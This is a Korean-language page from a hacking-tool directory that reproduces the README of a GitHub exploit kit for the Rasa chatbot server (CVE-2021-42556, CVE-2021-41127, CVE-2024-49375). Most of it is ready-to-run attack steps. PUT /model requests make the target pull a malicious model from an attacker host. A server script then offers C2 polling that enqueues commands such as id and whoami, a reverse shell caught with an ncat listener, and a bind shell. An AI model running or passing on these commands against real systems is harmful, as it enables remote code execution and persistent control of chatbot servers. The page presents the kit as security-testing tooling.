Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
도구/GitHubGitHub/lierbushiwo/rasa-cve-exp
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

바로 실행하면 됩니다.

root@kitploit:~
python server-1.py

image-20260604134536291

임의 파일 업로드

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

결과는 다음과 같습니다:

image-20260604135232815

CVE-2021-41127

  • server-1.py

기본 모델명: evil_import_model.tar.gz

악성 모델 데모

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

악성 대화 규칙 설정

greet 입력 시 PWNED_BY_CTF 반환

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

결과는 다음과 같습니다:

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py는 압축 파일 내 지정 데이터를 수정합니다.

직접 실행: 기본적으로 /model 디렉터리의 모델을 읽고 수정하여 현재 디렉터리에 evil_import_model.tar.gz로 저장합니다.

image-20260604143558105

리버스 IP 지정

기본 모델명: evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

순서대로 데이터를 전송하면 됩니다.

기타 공격 방법 exp

실제 환경에서는 다를 수 있습니다.

  • server-2.py

세 가지 모드


C2 모드 (HTTP 폴링, 권장)

root@kitploit:~
공격자                     Rasa 컨테이너(대상)
  │                            │
  ├─ server-2.py 실행 ─────────┤
  ├─ PUT /model ──→ /app/에 pwnmod.py 다운로드
  ├─ PUT /model ──→ 악성 모델 다운로드 → import pwnmod → agent 시작
  │                            │
  │  ← GET /poll?agent=xxx ───┤  3초마다 폴링
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  명령 획득
  │  ← POST /result ──────────┤  결과 반환
  ├─ /last?agent=xxx ──→ 결과 읽기
root@kitploit:~
# 공격자 실행
python server-2.py --mode c2 --c2-base-url http://<공격자IP>:8000 --port 8000

# 익스플로잇 트리거 (2단계)
curl -X PUT http://<rasa주소>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<공격자IP>:8000/write-module"}}'

curl -X PUT http://<rasa주소>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<공격자IP>:8000/model"}}'

# 명령 전송
curl "http://<공격자IP>:8000/enqueue?cmd=id"

# 8초 후 결과 읽기 (agent 3초 폴링 + 실행 시간)
curl "http://<공격자IP>:8000/last?agent=<hostname>"

# agent 미지정 시 와일드카드 사용
curl "http://<공격자IP>:8000/enqueue?cmd=whoami"
curl "http://<공격자IP>:8000/last"

Reverse 모드 (리버스 셸)

root@kitploit:~
# 1) 공격자 리스너 시작
ncat -lvnp 4444

# 2) 공격자 server-2.py 실행
python server-2.py --mode reverse --reverse-host <공격자IP> --reverse-port 4444 --port 8000

# 3) 익스플로잇 트리거
curl -X PUT http://<rasa주소>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<공격자IP>:8000/write-module"}}'

curl -X PUT http://<rasa주소>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<공격자IP>:8000/model"}}'

# 4) nc에서 $ 프롬프트 수신 후 직접 대화형

Bind 모드 (정방향 셸, 잘 사용 안 함)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent가 대상 컨테이너 내에서 0.0.0.0:4444 리스닝
# ncat <대상IP> 4444 로 연결

포트/주소 설명

파라미터의미
--port 8000server-2.py 자체 리스닝 포트
--c2-base-urlC2 모드에서 agent가 폴링할 전체 base URL (컨테이너가 접근 가능한 주소여야 함)
도구 다운로드
--reverse-host
리버스 셸의 대상 IP
--reverse-port리버스 셸의 대상 포트